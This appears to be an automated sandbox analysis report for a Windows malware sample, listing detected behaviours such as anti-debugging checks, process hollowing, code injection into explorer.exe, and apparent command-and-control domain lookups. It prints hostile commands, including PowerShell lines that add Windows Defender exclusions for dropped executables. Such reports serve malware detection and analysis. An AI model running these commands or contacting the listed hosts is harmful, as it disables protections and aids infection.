Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C032ACB mov eax, dword ptr fs:[00000030h] 22_2_6C032ACB
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C003ACA mov eax, dword ptr fs:[00000030h] 22_2_6C003ACA
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8ADD mov eax, dword ptr fs:[00000030h] 22_2_6C0D8ADD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C4AEF mov eax, dword ptr fs:[00000030h] 22_2_6C0C4AEF
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C032AE4 mov eax, dword ptr fs:[00000030h] 22_2_6C032AE4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 mov eax, dword ptr fs:[00000030h] 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 mov eax, dword ptr fs:[00000030h] 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 mov eax, dword ptr fs:[00000030h] 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 mov eax, dword ptr fs:[00000030h] 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 mov eax, dword ptr fs:[00000030h] 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 mov eax, dword ptr fs:[00000030h] 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 mov eax, dword ptr fs:[00000030h] 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 mov eax, dword ptr fs:[00000030h] 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 mov eax, dword ptr fs:[00000030h] 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 mov eax, dword ptr fs:[00000030h] 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 mov eax, dword ptr fs:[00000030h] 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 mov eax, dword ptr fs:[00000030h] 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 mov eax, dword ptr fs:[00000030h] 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 mov eax, dword ptr fs:[00000030h] 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 mov eax, dword ptr fs:[00000030h] 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 mov eax, dword ptr fs:[00000030h] 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 mov eax, dword ptr fs:[00000030h] 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 mov eax, dword ptr fs:[00000030h] 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 mov eax, dword ptr fs:[00000030h] 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 mov eax, dword ptr fs:[00000030h] 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02A309 mov eax, dword ptr fs:[00000030h] 22_2_6C02A309
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C131B mov eax, dword ptr fs:[00000030h] 22_2_6C0C131B
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C094320 mov eax, dword ptr fs:[00000030h] 22_2_6C094320
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BE33D mov eax, dword ptr fs:[00000030h] 22_2_6C0BE33D
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00F340 mov eax, dword ptr fs:[00000030h] 22_2_6C00F340
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00DB40 mov eax, dword ptr fs:[00000030h] 22_2_6C00DB40
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8B58 mov eax, dword ptr fs:[00000030h] 22_2_6C0D8B58
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00F358 mov eax, dword ptr fs:[00000030h] 22_2_6C00F358
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C033B5A mov eax, dword ptr fs:[00000030h] 22_2_6C033B5A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C033B5A mov eax, dword ptr fs:[00000030h] 22_2_6C033B5A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C033B5A mov eax, dword ptr fs:[00000030h] 22_2_6C033B5A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C033B5A mov eax, dword ptr fs:[00000030h] 22_2_6C033B5A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C096365 mov eax, dword ptr fs:[00000030h] 22_2_6C096365
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C096365 mov eax, dword ptr fs:[00000030h] 22_2_6C096365
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C096365 mov eax, dword ptr fs:[00000030h] 22_2_6C096365
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C033B7A mov eax, dword ptr fs:[00000030h] 22_2_6C033B7A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C033B7A mov eax, dword ptr fs:[00000030h] 22_2_6C033B7A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0AEB8A mov ecx, dword ptr fs:[00000030h] 22_2_6C0AEB8A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0AEB8A mov eax, dword ptr fs:[00000030h] 22_2_6C0AEB8A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0AEB8A mov eax, dword ptr fs:[00000030h] 22_2_6C0AEB8A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0AEB8A mov eax, dword ptr fs:[00000030h] 22_2_6C0AEB8A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C138A mov eax, dword ptr fs:[00000030h] 22_2_6C0C138A
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0BD380 mov ecx, dword ptr fs:[00000030h] 22_2_6C0BD380
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C004B94 mov edi, dword ptr fs:[00000030h] 22_2_6C004B94
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C00F395 mov eax, dword ptr fs:[00000030h] 22_2_6C00F395
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0C1BA8 mov eax, dword ptr fs:[00000030h] 22_2_6C0C1BA8
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C034BAD mov eax, dword ptr fs:[00000030h] 22_2_6C034BAD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C034BAD mov eax, dword ptr fs:[00000030h] 22_2_6C034BAD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C034BAD mov eax, dword ptr fs:[00000030h] 22_2_6C034BAD
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D9BBE mov eax, dword ptr fs:[00000030h] 22_2_6C0D9BBE
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0D8BB6 mov eax, dword ptr fs:[00000030h] 22_2_6C0D8BB6
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0853CA mov eax, dword ptr fs:[00000030h] 22_2_6C0853CA
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0853CA mov eax, dword ptr fs:[00000030h] 22_2_6C0853CA
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B23E3 mov ecx, dword ptr fs:[00000030h] 22_2_6C0B23E3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B23E3 mov ecx, dword ptr fs:[00000030h] 22_2_6C0B23E3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0B23E3 mov eax, dword ptr fs:[00000030h] 22_2_6C0B23E3
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C001BE9 mov eax, dword ptr fs:[00000030h] 22_2_6C001BE9
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C02DBE9 mov eax, dword ptr fs:[00000030h] 22_2_6C02DBE9
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C013BF4 mov eax, dword ptr fs:[00000030h] 22_2_6C013BF4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C013BF4 mov ecx, dword ptr fs:[00000030h] 22_2_6C013BF4
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C0023F6 mov eax, dword ptr fs:[00000030h] 22_2_6C0023F6
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_02DC0D90 mov eax, dword ptr fs:[00000030h] 27_2_02DC0D90
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_02DC092B mov eax, dword ptr fs:[00000030h] 27_2_02DC092B
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Code function: 27_2_02DED526 push dword ptr fs:[00000030h] 27_2_02DED526
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Roaming\esdfufc Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Process queried: DebugPort
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 0_2_0041D410 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041D410
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C036B90 rdtsc 22_2_6C036B90
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C049600 ZwOpenKey,LdrInitializeThunk, 22_2_6C049600
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Memory allocated: page read and write | page guard Jump to behavior
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 0_2_0041D410 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041D410
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 0_2_004266A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_004266A0
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 12_2_0041D410 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_0041D410
Source: C:\Users\user\AppData\Roaming\esdfufc Code function: 12_2_004266A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_004266A0

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: iyc.jelikob.ru
Source: C:\Windows\explorer.exe Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe Domain query: znpst.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: nusurtal4f.net
Source: C:\Windows\explorer.exe Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe Domain query: hajezey1.top
Source: C:\Windows\explorer.exe Domain query: sysaheu90.top
Benign windows process drops PE files
Source: C:\Windows\explorer.exe File created: 37D8.exe.6.dr Jump to dropped file
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Roaming\esdfufc Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Roaming\esdfufc Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Memory written: C:\Users\user\Desktop\y8WngeDn4q.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\esdfufc Memory written: C:\Users\user\AppData\Roaming\esdfufc base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8908.exe Memory written: C:\Users\user\AppData\Local\Temp\8908.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe base: 400000 value starts with: 4D5A Jump to behavior
Contains functionality to inject code into remote processes
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Code function: 0_2_04760110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 0_2_04760110
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Thread created: C:\Windows\explorer.exe EIP: 2801920 Jump to behavior
Source: C:\Users\user\AppData\Roaming\esdfufc Thread created: unknown EIP: 41A1920 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Thread created: unknown EIP: 48F19C0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6E1E.exe Thread created: unknown EIP: 4E81920
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\37D8.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\60DF.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\37D8.exe' -Force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\60DF.exe' -Force Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe base address: 400000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe base: 402000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe base: 41C000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe base: 41E000 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Process created: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Process created: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\y8WngeDn4q.exe Process created: C:\Users\user\Desktop\y8WngeDn4q.exe 'C:\Users\user\Desktop\y8WngeDn4q.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\esdfufc Process created: C:\Users\user\AppData\Roaming\esdfufc C:\Users\user\AppData\Roaming\esdfufc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8908.exe Process created: C:\Users\user\AppData\Local\Temp\8908.exe C:\Users\user\AppData\Local\Temp\8908.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\37D8.exe' -Force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Process created: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\60DF.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\60DF.exe' -Force Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe' /SpecialRun 4101d8 5988
Source: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\98e85b6a-1246-45d9-ab1c-f2e36131ecec\AdvancedRun.exe' /SpecialRun 4101d8 780
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\b3a1716e-237f-4fbf-b044-f43f2eeceac1\AdvancedRun.exe Code function: 25_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError, 25_2_00401C26
Source: C:\Users\user\AppData\Local\Temp\4EDC.exe Code function: 22_2_6C03E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid, 22_2_6C03E730
Source: explorer.exe, 00000006.00000000.394005574.0000000000EE0000.00000002.00020000.sdmp, csdfufc, 00000027.00000002.672507255.0000000003790000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.394005574.0000000000EE0000.00000002.00020000.sdmp, csdfufc, 00000027.00000002.672507255.0000000003790000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.394005574.0000000000EE0000.00000002.00020000.sdmp, csdfufc, 00000027.00000002.672507255.0000000003790000.00000002.00020000.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000006.00000000.394005574.0000000000EE0000.00000002.00020000.sdmp, csdfufc, 00000027.00000002.672507255.0000000003790000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\37D8.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\37D8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\3FD8.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3FD8.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
